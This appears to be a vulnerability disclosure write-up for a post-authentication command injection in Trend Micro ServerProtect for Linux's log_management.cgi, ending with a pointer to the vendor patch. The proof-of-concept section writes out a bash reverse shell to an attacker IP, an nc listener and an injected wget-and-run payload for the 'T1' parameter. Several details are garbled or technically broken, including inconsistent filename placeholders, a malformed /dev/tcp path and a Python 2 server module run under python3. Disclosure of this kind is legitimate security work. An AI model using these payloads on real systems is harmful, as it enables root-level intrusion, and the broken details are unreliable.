Trend Micro Server Protect Linux Command Injection
Trend Micro ServerProtect for Linux (ServerProtect) provides comprehensive protection against viruses, worms, Trojans, and spyware/grayware targeted at file servers based on the Linux operating system. Managed through an intuitive portable Web-based console, ServerProtect provides centralized virus/malware scanning, pattern updates, event reporting, and antivirus configuration.
More information at https://success.trendmicro.com/product-support/serverprotect-for-linux
Command injection vulnerability found in Server Protect Linux. The log_management.cgi did not sanitize input parameter before execute system command.This issue can be exploit after login as administrator. Attacker can perform remote code execution with this issue.
Post-Auth Remote Code Execution.
When ServerProtect is installed, it will be run as root privileged.
ServerProtect has web interface and can be login as administrator with null password (fresh install)
"Log Directory" is a page that help user specify the location where they want to store all the log files. If that directory is new, it will pop-up a form to ask user want to create directory.
After submitted the save log directory request. It will be saved in /opt/TrendMicro/SProtectLinux/tmaplui.xml. Then, application will use amvalidator binary in folder /opt/TrendMicro/SProtectLinux/SPLX.vsapiapp/ to parse that "xml" file.
We did reverse engineering amvalidator binary and found that it run function "system("command")" to create folder if it has not created yet, "command" parameter at first is
command = "/bin/mkdir -p -m 0700" ...
Then It will add the new directory "NEW_PATH" that was input in web interface.
command += "/bin/PATH" + "NEW_PATH"
So we can inject command through that "NEW_PATH" to exploit
When we tried to attempt command injection here with command: "touch EC{EORC}", but it didn't work. It added slashes before "[EKORC]". We attempted to bypass it with "{{FS}}".
So the command we injected become "touch\$(FS){ECO}RC" and the full data parse to "T1" parameter is "/a/touch\$(FS){ECO}RC/". But parameter in web client check several characters so we need to intercept and send this request through BurpSuite
Then We found that file "ECORC" created in folder "/opt/TrendMicro/SProtectLinux/ECORC"
We attempt to perform a proof-of-concept : Create a reverse shell connect back to our server.
Firstly, We created a simple reverse shell "index.html" file in our server "192.168.1.100" is our attacker server and "31337" is listening port on our server.
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.100:31337 0>&1
Then we served a HTTP server on port "5555" with simple HTTPServer python :
$ python3 -m SimpleHTTPServer 5555
In other terminal, We listened on port "31337" to wait for reverse shell.
$ nc -lvnp 31337
Then we POST request to URL: https://[HOST]:14243/SProtectLinux/log_management.cgi with payload in "T1" parameter:
/b;wget\$(FS){IFS}192.168.1.100:5555;bash\$(FS){IFS}index.html
Trend Micro has released a new Critical Patch (CP) for Trend Micro ServerProtect for Linux 3.0, which resolves a command injection vulnerability in the product. https://success.trendmicro.com/solution/000268419